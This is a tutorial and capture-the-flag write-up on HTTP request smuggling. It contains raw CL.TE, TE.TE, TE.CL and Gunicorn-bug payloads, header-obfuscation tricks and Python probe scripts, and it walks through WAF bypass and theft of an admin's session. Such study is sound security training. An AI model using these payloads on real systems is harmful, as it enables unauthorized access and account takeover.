Deep Dive Into HTTP Request Smuggling Attacks
This is a repost of a blog post I've already created. Check out my blog here! I hope you enjoy it! Please feel free to review it and give me your feedback. Any suggestions for improvement, ideas, or new topics would be greatly appreciated.
Introduction to HTTP Request Smuggling/Desync Attacks
HTTP Request Smuggling, sometimes also referred to as Desync Attacks, creates a desynchronization between the reverse proxy and the web server behind it. This advanced technique allows an attacker to bypass security controls such as WAFs or even compromise other users by influencing their requests.
Since HTTP is a stateless protocol, we often view HTTP requests in isolation from each other. However, HTTP/1.1 allows for the reuse of TCP sockets to send multiple requests and responses to improve performance. In such cases, the TCP stream contains multiple HTTP requests (pipelining).
To determine where one request ends and the next begins, the web server needs to know the length of each request's body. The Content-Length (CL) or Transfer-Encoding (TE) HTTP headers are used for this purpose. While the Content-Length header specifies the length of the request body in bytes, the Transfer-Encoding header can indicate a chunked encoding, meaning that the request body contains multiple chunks of data.
In contrast, HTTP/2 is a binary protocol that offers performance improvements over the text-based HTTP/1.1 by efficiently encoding messages and defining their body length. However, it can be converted to HTTP/1.1 by intermediaries, potentially introducing vulnerabilities...
As highlighted above, Desync or Request Smuggling Attacks are considered an advanced attack vector that exploits discrepancies between frontend and backend systems in parsing incoming HTTP requests. These attacks force a disagreement in request boundaries between the two systems, thus causing a desynchronization.
The frontend system may include any intermediary system such as a reverse proxy, web cache, or web application firewall (WAF), while the backend system is typically the web server. To fully grasp what's happening behind the scenes, it's recommended to have some understanding of the TCP and HTTP protocols.
TCP Stream of HTTP requests
When HTTP wants to transmit a message, it streams the contents of the message data, in order, through an open TCP connection. TCP takes the stream of data, chops it up into chunks called segments, and transports these segments across the Internet in envelopes called IP packets. This process is all handled by the TCP/IP software; the HTTP programmer does not see any of it.
Each TCP segment is carried by an IP packet from one IP address to another. Each of these IP packets contains an IP header, a TCP segment header, and a chunk of TCP data.
The IP header includes the source and destination IP addresses, the size, and other flags. The TCP segment header includes TCP port numbers, control flags, and numeric values used for data ordering and integrity checking.
HTTP requests and responses are transmitted using TCP. In HTTP/1.0, each HTTP request was sent over a separate TCP socket (at least before this version was extended). Since HTTP/1.1, however, requests are typically not sent over separate TCP connections; instead, the same TCP connection is reused to transmit multiple request-response pairs (persistent connections, which also enable pipelining).
This method allows for better performance since establishing TCP connections takes time. If a new HTTP request required a new TCP connection, the overhead would be much higher. Particularly, in environments where a reverse proxy sits in front of the actual web server and all requests are transmitted from the reverse proxy to the web server, the TCP socket is usually kept open and reused for all requests.
Since TCP is stream-oriented, multiple HTTP requests are sent one after another in the same TCP stream. The TCP stream contains all HTTP requests back-to-back, as there is no separator between them. Consider this simplified representation of a TCP stream containing three HTTP requests, a POST request followed by two GET requests:
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 5

HELLOGET /index HTTP/1.1
Host: philocyber.com
Content-Length: 23

This is another exampleGET /admin HTTP/1.1
Host: philocyber.com
Transfer-Encoding: chunked

2
HI
0
In the example above, for the reverse proxy and web server to parse the HTTP requests correctly, both need to recognize where the current request ends and the next begins. In other words, both systems must identify the request boundaries within the TCP stream. Here, the first request declares a CL of 5, which places the boundary of the first HTTP message between HELLO and GET.
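To make the idea of request boundaries concrete, here is a minimal sketch of how a parser could cut a TCP stream into requests. It is an illustration under stated assumptions, not how any real server is implemented: the function name split_requests is hypothetical, and it only understands Content-Length (no chunked encoding).

```python
def split_requests(stream: bytes) -> list[bytes]:
    """Split a raw byte stream into HTTP/1.1 requests using Content-Length only."""
    requests = []
    while stream:
        # The header block ends at the first empty line (CRLF CRLF).
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("incomplete header block")
        length = 0  # no Content-Length header means no body in this sketch
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        requests.append(head + sep + rest[:length])
        stream = rest[length:]  # whatever follows belongs to the next request
    return requests


stream = (
    b"POST / HTTP/1.1\r\nHost: philocyber.com\r\nContent-Length: 5\r\n\r\nHELLO"
    b"GET /index HTTP/1.1\r\nHost: philocyber.com\r\n\r\n"
)
for request in split_requests(stream):
    print(request.split(b"\r\n")[0].decode())
```

The only thing separating HELLO from GET is the number in the Content-Length header, which is exactly what a smuggling attack tampers with.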
Content-Length vs Transfer-Encoding
To determine the length of the current request's body, we can use HTTP headers. Specifically, the Content-Length (CL) and Transfer-Encoding (TE) headers are used for this. They work differently, so let's look at how each one indicates the request length.
Content-Length
The CL (Content-Length) header is commonly used, and you've likely encountered it many times when dealing with web applications. It specifies the length of the message body in bytes. Let's consider an example request:
""" The CL header specifies a length of 29 bytes. Therefore, all systems know that this HTTP
request contains a request body that is exactly 29 bytes long."""
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

param1=HelloWorld&param2=Test
Transfer-Encoding
The TE (Transfer-Encoding) header, in turn, can specify the chunked directive. Other directives such as compress, deflate, and gzip also exist, but they do not delimit the size of the HTTP request. Let's examine the same request using chunked encoding:
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1d
param1=HelloWorld&param2=Test
0
The HTTP header Transfer-Encoding specifies a chunked encoding. This means the body consists of chunks of data, each preceded by its size in hexadecimal on a separate line, followed by the payload of the chunk. The request concludes with a chunk of size 0, indicating the end. As illustrated, the request includes a chunk of size 0x1d, equivalent to 29 in decimal, followed by the same payload as the previous request. The request then ends with the empty chunk.
It's important to note that the sizes of the chunks and the chunks themselves are separated by the CRLF (Carriage Return Line Feed) control sequence. When displaying the CRLF characters, the request body is shown as follows:
1d\r\nparam1=HelloWorld&param2=Test\r\n0\r\n\r\n
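The relationship between the two encodings can be checked with a few lines of Python. This is a minimal sketch: encode_chunked is a hypothetical helper that always emits a single chunk plus the terminating empty chunk, whereas real clients may split a body into many chunks.

```python
def encode_chunked(body: bytes) -> bytes:
    """Encode a body as one chunk followed by the terminating empty chunk."""
    size = format(len(body), "x").encode()  # chunk size in hexadecimal
    return size + b"\r\n" + body + b"\r\n" + b"0\r\n\r\n"


body = b"param1=HelloWorld&param2=Test"
print(len(body))             # the value a Content-Length header would carry
print(encode_chunked(body))  # the same body in chunked encoding
```

The first line printed is the decimal length used by Content-Length, while the chunked form carries the same number in hexadecimal (1d) in front of the payload.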
Transfer-Encoding over Content-Length
So, what happens if a request carries both headers? The HTTP specification already defines how an application should behave:
If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
For more information about this, please refer to the following: RFC
To summarize, if a request contains both a CL and a TE header, the TE header takes precedence and the CL header should be ignored. HERE is where things start to get funny and magical.
Desynchronization
Request smuggling attacks exploit discrepancies between the reverse proxy and the web server (I'll keep repeating this, sorry; it is the only way to really understand the nature of this vulnerability). In particular, the attack forces a disagreement in the request boundaries between the two systems, thus causing a desynchronization, which is why request smuggling attacks are sometimes also called Desync Attacks.
But what can be achieved by this desync?
Generally speaking, there is a belief that HTTP requests are handled in isolation and that different HTTP requests therefore can't influence each other, BUT it's actually the opposite. If the application is used by many users, there is a high chance of influencing third-party HTTP requests by injecting malicious payloads into them.
Since multiple requests are sent over the same TCP stream as discussed above, a disagreement in request boundaries by different systems (reverse proxy and backend server) enables an attacker to achieve exactly that.
When the reverse proxy and web server disagree on the boundaries of an HTTP request (one following TE, the other CL), some data is left over in the TCP stream between the end of one request and the beginning of the next. One of the two systems treats this data as part of the previous request, while the other treats it as the start of a new, partial HTTP request. Thanks to this, an attacker may manipulate the next HTTP request of a real user, gaining access to sensitive information about the system and the user, or even making changes on behalf of another user.
Depending on the specific type of disagreement between the systems, HTTP request smuggling vulnerabilities can have different impacts, including mass exploitation of XSS, stealing of other users' data, and WAF bypasses. For more details on HTTP request smuggling attacks, have a look at this great blog post by James Kettle.
CL.TE Attack
The most common type of desync attack is CL.TE. It occurs when the reverse proxy uses the Content-Length header to determine the boundary of the HTTP request (in other words, it does not support chunked encoding), while the back-end server uses the Transfer-Encoding header. So, if a request carries both headers, the reverse proxy, which does not support TE, will (incorrectly) rely on the CL instead.
Reverse Proxy Interpretation:
Let's first look at the request below from the reverse proxy's perspective. Since the reverse proxy does not support chunked encoding, it uses the CL header to determine the request body's length. The CL header gives the length as 10 bytes, meaning the request body is parsed as 0\r\n\r\nHELLO:
Reverse Proxy
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO
So in this case, the reverse proxy follows the CL and treats both 0 and HELLO as part of the body.
Web Server Interpretation:
The web server correctly prefers the TE header over the CL header, as defined in the RFC shown in the previous section. Since the request body in chunked encoding is terminated by the empty chunk with size 0, the web server parses the request body as 0\r\n\r\n:
Web Server
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO
As mentioned above, a chunked parser treats the 0 chunk as the end of the body, so HELLO is left in the TCP stream and gets prepended to the following request, corrupting its HTTP method.
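The two interpretations can be reproduced with a small simulation. This is only a sketch under stated assumptions: body_by_content_length and body_by_chunked are hypothetical stand-ins for the reverse proxy and the web server, and neither does any error handling.

```python
RAW = (
    b"POST / HTTP/1.1\r\n"
    b"Host: philocyber.com\r\n"
    b"Content-Length: 10\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\nHELLO"
)


def body_by_content_length(raw: bytes) -> tuple[bytes, bytes]:
    """Return (body, leftover) the way a Content-Length-only parser would."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return rest[:length], rest[length:]


def body_by_chunked(raw: bytes) -> tuple[bytes, bytes]:
    """Return (body, leftover) the way a chunked parser would."""
    _, _, rest = raw.partition(b"\r\n\r\n")
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line, 16)
        if size == 0:
            # Skip the CRLF that closes the empty chunk.
            return body, rest[2:]
        body, rest = body + rest[:size], rest[size + 2:]


print(body_by_content_length(RAW))  # proxy view: everything is body
print(body_by_chunked(RAW))         # server view: empty body, HELLO left over

_, leftover = body_by_chunked(RAW)
next_request = leftover + b"GET / HTTP/1.1\r\nHost: philocyber.com\r\n\r\n"
print(next_request.split(b"\r\n")[0])  # request line the server sees next
```

The last line shows why the second response is an error: the leftover bytes are glued in front of the next request's method.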
So hey! We created our very first desync attack! It wasn't that hard, was it? But what exactly did we do before?...
Server response no. 1
200 OK
Server response no. 2
405 Not Allowed
Identification of the CL.TE attack
We can use two requests sent within a short time of each other to emulate the interaction of two different users. The goal is for our first request to interfere with the second one.
In this example we can see how we successfully influence and manipulate a third party HTTP request.
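Outside of Burp, the same two-request probe could be scripted. The sketch below is an assumption-heavy illustration: build_clte_probe, build_follow_up, and send_on_one_connection are hypothetical helpers, the target speaks plain HTTP, and whether both requests share a back-end connection depends on the proxy. Only run it against systems you are authorized to test.

```python
import socket


def build_clte_probe(host: str, prefix: bytes = b"HELLO") -> bytes:
    """First request: CL covers the whole body, TE ends it at the 0 chunk."""
    body = b"0\r\n\r\n" + prefix
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n" + body
    )


def build_follow_up(host: str) -> bytes:
    """Second request: a harmless GET that plays the role of the other user."""
    return b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n\r\n"


def send_on_one_connection(host: str, port: int, requests: list[bytes]) -> bytes:
    """Send all requests back-to-back on one TCP connection; return raw replies."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as sock:
        for request in requests:
            sock.sendall(request)
        try:
            while data := sock.recv(4096):
                chunks.append(data)
        except socket.timeout:
            pass  # no more data arrived within the timeout
    return b"".join(chunks)


probe = build_clte_probe("philocyber.com")
print(probe.decode())
```

A call such as send_on_one_connection(host, port, [probe, build_follow_up(host)]) would then be expected to return a 200 followed by a 405 on a vulnerable setup, matching the responses described above.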
Exploitation of a CL.TE attack
How far we can escalate the severity of the attack is closely tied to the environment/web application we are testing, so it's dynamic and always changing. However, we can still start with some reconnaissance, like retrieving the /robots.txt information.
In this HTB module, we face a challenge: to grab the flag value. Unfortunately, we do not have the administrator privileges required to do that, so we need to apply what we've learned in order to get it.
Since we do not have access to the flag, we can attempt to compel the potential admin to make the change for us. By creating a desync attack where we inject the endpoint we need in order to capture what we are after, we can do the following:
In this case, the request is chunked for the web server but is processed as CL by the reverse proxy, meaning that the reverse proxy will forward the entire request as one unit, and the back-end server will interpret it as two different requests. This delivers a response for the chunked part and takes the second fake header as the start of the next incoming request. This is how we can trick the system into making arbitrary requests.
So, if we visit the /admin.php endpoint once again, we will see the unmasked flag value (don't worry about the flag, fortunately, HTB rotates the valid values).
TE.TE Attack
This example, as we can deduce, is about Transfer-Encoding issues and discrepancies between the reverse proxy and the web server regarding how they support this header/directive.
So how can there be any problem if both systems rely on the TE header to parse HTTP requests?
Well... it's actually more about which system follows the RFC standard mentioned previously. There's a chance that both systems accept the TE header but only one enforces the standard. So, if we manipulate the request, we can add a malicious/malformed Transfer-Encoding header, forcing one of the two systems to misinterpret the request as follows:
Identification of the TE.TE attack
Description | Header
Substring match | Transfer-Encoding: testchunked
Space in header name | Transfer-Encoding : chunked
Horizontal tab separator | Transfer-Encoding:[\x09]chunked
Vertical tab separator | Transfer-Encoding:[\x0b]chunked
Leading space |  Transfer-Encoding: chunked (a space precedes the header name)
To identify a TE.TE request smuggling vulnerability, we need to trick either the reverse proxy or the web server into ignoring the TE header. We can do this by slightly deviating from the specification to check whether the implementation of the two systems adheres to the specification accurately.
For example, some systems might only check for the presence of the keyword chunked in the TE header, while other systems require an exact match. In such cases, it is sufficient to set the TE header to testchunked to trick one of the two systems into ignoring the TE header and falling back to the CL header instead.
Note: The sequences [\x09] and [\x0b] are not the literal character sequences used in the obfuscation. Rather, they denote the horizontal tab character (ASCII 0x09) and the vertical tab character (ASCII 0x0b).
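To see how such variants can split two implementations, the sketch below runs the header lines from the table through two toy parsers. Both parsers are hypothetical: strict_te_is_chunked stands in for a system that demands an exact header name and value, lenient_te_is_chunked for one that only looks for the keywords. Real products behave in their own ways, so each variant has to be tested against the actual target.

```python
TE_VARIANTS = {
    "substring match": b"Transfer-Encoding: testchunked",
    "space in header name": b"Transfer-Encoding : chunked",
    "horizontal tab separator": b"Transfer-Encoding:\x09chunked",
    "vertical tab separator": b"Transfer-Encoding:\x0bchunked",
    "leading space": b" Transfer-Encoding: chunked",
}


def strict_te_is_chunked(header_line: bytes) -> bool:
    """Exact header name; value must be 'chunked' after trimming space/tab."""
    name, sep, value = header_line.partition(b":")
    return (
        bool(sep)
        and name.lower() == b"transfer-encoding"
        and value.strip(b" \t").lower() == b"chunked"
    )


def lenient_te_is_chunked(header_line: bytes) -> bool:
    """Accept any line that mentions both the header name and 'chunked'."""
    lowered = header_line.lower()
    return b"transfer-encoding" in lowered and b"chunked" in lowered


for label, line in TE_VARIANTS.items():
    strict = strict_te_is_chunked(line)
    lenient = lenient_te_is_chunked(line)
    print(f"{label:26} strict={strict} lenient={lenient}")
```

Every row where the two columns differ is a candidate for a desync: one system parses the body as chunked while the other falls back to the CL header.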
So we can leverage this attack by changing the hex code like:
If we repeat the same request we will find the HTTP Error Method message:
It is important to mention that we need to delete the Connection header or at least change the directive to 'keep-alive'. This particular header is crucial because it ensures that the TCP connection remains open, allowing multiple requests to be sent over a single connection. This persistent connection is a key factor in executing smuggling techniques, facilitating the delivery of crafted payloads intended to exploit parsing discrepancies between front-end and back-end servers.
Exploitation of the TE.TE attack
For this case, the process is pretty much the same. Once we've identified the issue and the header payload we need to construct, we can run something like this to retrieve the flag value of the challenge:
We should run this payload a few times in order to wait for the “admin” request.
GET / HTTP/1.1
Host: 94.237.55.163:40322
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9 (...)
Accept-Language: en-US,en;q=0.9
Transfer-Encoding:chunked
Connection: close
Content-Length: 46

0

GET /admin?reveal_flag=1 HTTP/1.1
HELLO:
TE.CL Attack
To send the requests shown in this section, we need to manipulate the CL header. To do this in Burp Repeater, we need to instruct Burp not to update the CL header automatically. Additionally, we need to create a tab group in Burp Repeater. We can add two repeater tabs to a tab group by right-clicking any repeater request tab and selecting Add tab to group > Create tab group (having multiple requests in a tab group gives us the option to send the requests in sequence, which is necessary to exploit the lab below).
Identification of the TE.CL attack
This type of vulnerability arises if the reverse proxy uses chunked encoding while the web server uses the CL header. Consider a request like the following:
Reverse proxy's perspective
POST / HTTP/1.1
Host: tecl.htb
Content-Length: 3
Transfer-Encoding: chunked

5
HELLO
0

Web Server
POST / HTTP/1.1
Host: tecl.htb
Content-Length: 3
Transfer-Encoding: chunked

5
HELLO
0
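Since both views show the same bytes, it helps to compute where each system stops reading. The following is a minimal sketch under the assumption that the reverse proxy parses chunked encoding and the web server reads exactly Content-Length bytes; chunked_end is a hypothetical helper.

```python
RAW_BODY = b"5\r\nHELLO\r\n0\r\n\r\n"
CONTENT_LENGTH = 3  # value of the CL header in the request


def chunked_end(data: bytes) -> int:
    """Return the offset just past the terminating empty chunk."""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return pos + 2   # skip the CRLF that closes the empty chunk
        pos += size + 2      # skip the chunk data and its trailing CRLF


proxy_body = RAW_BODY[:chunked_end(RAW_BODY)]   # reverse proxy (TE)
backend_body = RAW_BODY[:CONTENT_LENGTH]        # web server (CL)
leftover = RAW_BODY[CONTENT_LENGTH:]            # stays in the TCP stream

print(proxy_body)
print(backend_body)
print(leftover)
```

The reverse proxy forwards all 15 bytes as one body, while the web server consumes only 5\r\n and treats everything from HELLO onward as the beginning of the next request.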
Exploitation and Exercise
For this case, we need to take the request to '/' and send it to the repeater twice, adding both tabs to the same group so we can send them using Send group (single connection). The first tab will contain the payload targeting the path filtered by the WAF, and the second tab will capture the response from '/admin'.
GET / HTTP/1.1
Host: 94.237.58.211:47811
Content-Length: 4
Transfer-Encoding: chunked

32
GET /admin HTTP/1.1
Host: 94.237.58.211:47811


0

The Content-Length is 4 because the web server only takes 32\r\n (4 bytes) as the body. We have two empty lines in each place, after the second Host and after the 0, because this is how we specify where the headers end and where the payload starts. The chunk size, 32 in hexadecimal (50 bytes) in this case, has to account for this: it covers the smuggled request line, the Host header, and the empty line that ends the headers.
GET / HTTP/1.1
Host: 94.237.58.211:47811
So, this second tab will receive the response from the chunked request we sent in the first tab.
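Counting these bytes by hand is error-prone, so the values used in the first tab can be derived with a short script. This is a sketch with a hypothetical helper, build_tecl_body, which wraps the smuggled request in a single chunk and returns the Content-Length that covers only the chunk-size line.

```python
def build_tecl_body(smuggled: bytes) -> tuple[bytes, int]:
    """Return (request body, Content-Length value for the outer request)."""
    size_line = format(len(smuggled), "x").encode() + b"\r\n"
    body = size_line + smuggled + b"\r\n" + b"0\r\n\r\n"
    # The web server (CL) should stop right after the chunk-size line.
    return body, len(size_line)


smuggled = b"GET /admin HTTP/1.1\r\nHost: 94.237.58.211:47811\r\n\r\n"
body, content_length = build_tecl_body(smuggled)

print(format(len(smuggled), "x"))  # chunk size in hex
print(content_length)              # Content-Length for the outer request
print(body)
```

For the request above this yields a chunk size of 32 and a Content-Length of 4, and it keeps both values correct if the host or path of the smuggled request changes.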
One important detail: a plain 'chunked' value is not enough here, so we need the same obfuscation technique we used before. To retrieve the flag value, the request has to use a value such as testchunked or whateverchunked...
Vulnerable Software
So far, we've noticed request smuggling issues caused by faulty parsing or a lack of support for the TE header. However, web servers or reverse proxies can also be vulnerable to request smuggling owing to other issues that cause a request's length to be incorrectly processed...
In this lab, we will exploit a vulnerability in the Gunicorn HTTP web server that was detailed in this blog post. Gunicorn 20.0.4 contained a bug when encountering the HTTP header Sec-Websocket-Key1 that fixed the request body to a length of 8 bytes, regardless of the values set for the CL and TE headers. This is a special header used in the establishment of WebSocket connections. Since the reverse proxy does not suffer from this bug, this allows us to create a desynchronization between the two systems.
Identification of the Gunicorn 20.0.4 bug
GET / HTTP/1.1
Host: gunircorn.philocyber.com
Sec-Websocket-Key1: x
Content-Length: 61

xxxxxxxxGET /404 HTTP/1.1
Host: gunircorn.philocyber.com

GET / HTTP/1.1
Host: gunircorn.philocyber.com
So, how does the back-end server process these requests? As we might expect, the reverse proxy simply uses the CL, forwarding everything to the back-end. Then, the back-end parses the Sec-WebSocket-Key1 header instead of using the CL, assuming a body of 8 bytes.
It is always 8 bytes, nothing more or less. Take a look at the code!
(...)
    elif name == "TRANSFER-ENCODING":
        if value.lower() == "chunked":
            chunked = True
    elif name == "SEC-WEBSOCKET-KEY1":
        content_length = 8

if chunked:
    self.body = Body(ChunkedReader(self, self.unreader))
(...)
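So the back-end server takes the first 8 bytes (xxxxxxxx) as the body of the first request and treats GET /404 as a second, separate request. The response to that smuggled request is then returned for the request that follows it, which the back end sees as the third one.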
GET / HTTP/1.1
Host: gunircorn.philocyber.com
Sec-Websocket-Key1: x
Content-Length: 61

xxxxxxxxGET /404 HTTP/1.1
Host: gunircorn.philocyber.com

GET / HTTP/1.1
Host: gunircorn.philocyber.com
Exploitation of the Gunicorn 20.0.4 bug and challenge
GET / HTTP/1.1
Host: 94.237.56.188:40884
Content-Length: 58
Sec-Websocket-Key1: x

xxxxxxxxGET /admin HTTP/1.1
Host: 94.237.56.188:40884

GET / HTTP/1.1
Host: 94.237.56.188:40884
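The numbers in this payload can be sanity-checked with a short simulation. It is a sketch under stated assumptions: the reverse proxy is assumed to honor Content-Length, and split_like_buggy_backend is a hypothetical stand-in for the fixed 8-byte body handling described above, not Gunicorn's actual code.

```python
def split_like_buggy_backend(body: bytes, fixed_length: int = 8) -> tuple[bytes, bytes]:
    """Consume a fixed number of body bytes, regardless of CL or TE."""
    return body[:fixed_length], body[fixed_length:]


smuggled = b"GET /admin HTTP/1.1\r\nHost: 94.237.56.188:40884\r\n\r\n"
body = b"x" * 8 + smuggled  # 8 filler bytes that the back end swallows as the body

# What the reverse proxy needs in the Content-Length header to forward it all.
print(len(body))

consumed, leftover = split_like_buggy_backend(body)
print(consumed)                      # body of the first request for the back end
print(leftover.split(b"\r\n")[0])    # request line the back end parses next
```

The length printed first is the value to put in Content-Length, and the leftover starts exactly at the smuggled GET /admin request line.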
Exploitation of Request Smuggling
In the previous sections, we explored several types of HTTP request smuggling attacks and how to detect them. We will now explore several methods for exploiting them. HTTP request smuggling vulnerabilities have a high impact because they allow attackers to bypass security controls such as WAFs, force other users to perform authenticated actions, capture other users' personal data, steal their sessions in order to take over accounts, and mass-exploit reflected XSS vulnerabilities.
So, we will explore three different ways to exploit this vulnerability. First, we look at WAF bypassing, then we will see how to steal user data using a POST request to write comments on a website, and... last but not least, HTB shows in this section how a massive XSS + HTTP Desync may work when combined (bonus fun point).
The challenge this time is about exploiting HTTP request smuggling to force a user to enter their credentials in the comment section.
Challenge
So, we started by doing some tests just to determine which kind of HTTP Desync we are dealing with. In this case, after a few tries, we know it is CL.TE, meaning the reverse proxy uses the Content-Length to parse the request, but the backend server uses the Transfer-Encoding instead. This means that in the same test (a repeater group sent over a single connection), we get 200 OK for the first request and 405 Not Allowed for the second one, since the backend server prepends 'HELLO' to the first line of the next request, turning GET into HELLOGET... (method not allowed).
The attack
So, after we've discovered the problem, we NEED to start understanding HOW we trigger that functionality.
I spent a lot of time trying things without first confirming them, so don't lose your hacker mindset; first understand, then attack, and finally, enjoy.
So, in order to do it as efficiently as possible, we need to think about the restrictions in place to get that 'comment request' done. For this particular case, we verified that the request needs a Cookie value (an authenticated session) plus the CSRF token of that same user; a CSRF token cannot be used without the matching authenticated session.
This request is quite good but not enough... I'm not sure why, but we need to provide the Content-Type header, as in the real request, in order for this to work.
IMPORTANT: We can validate what kind of HTTP request smuggling we have, if we have one, without using any extra headers. Just the first line, Host, TE, and CL are enough. In order to exploit a specific functionality, we NEED to keep all the headers of the real request, just to avoid any issue with how the web application handles that specific request/functionality.
So now we know that the first section triggers the HTTP request smuggling (we used it before to validate the issue). In this case, the payload should ALSO contain the Content-Type + the Cookie + the CSRF token for that user (our user).
Finally we got the value of the admin user:
Something I noticed is that I was copy-pasting only the cookie value, so in my case I was trying to access the admin panel using “Cookie: PHPSESSID:fd1dt4khy36dthmc” when I should have used “Cookie: session=fd1dt4khy36dthmc” (I know, it's silly, but worth telling you).
JUST BE CAREFUL WITH THESE DETAILS
Request Smuggling Tools & Prevention
A useful tool to help us in the identification and exploitation of HTTP request smuggling vulnerabilities is the Burp Extension HTTP Request Smuggler. We can install it from the Burp Extensions Store in the Extensions tab. Go to BApp Store and install the extension from there.
This section has good configurations to search for this vulnerability in a more automated way. It's worth giving it a look, but I don't think it's worth adding more information about automation in this post.
Mitigations and recommended steps
Preventing HTTP request smuggling attacks generally is no easy task, as the issues causing request smuggling vulnerabilities often reside within the web server software itself. Thus, they cannot be prevented from within the web application. Furthermore, web application developers might be unaware of underlying quirks in the web server, which might lead to HTTP request smuggling vulnerabilities, such that they have no chance of preventing them. However, there are some general recommendations we can follow when configuring our deployment setup to ensure that the risk of HTTP request smuggling vulnerabilities is as minimal as possible, or at least the impact is reduced:
Most of these examples/exercises were taken from the 'HTTP Attacks' (CRLF Injection, HTTP Desync and HTTP/2 Downgrading) HTB module. Path: Senior Web Penetration Tester. Exam: Certified Web Exploitation Expert (CWEE). Difficulty: Hard. Tier: III. Module Author: vautia.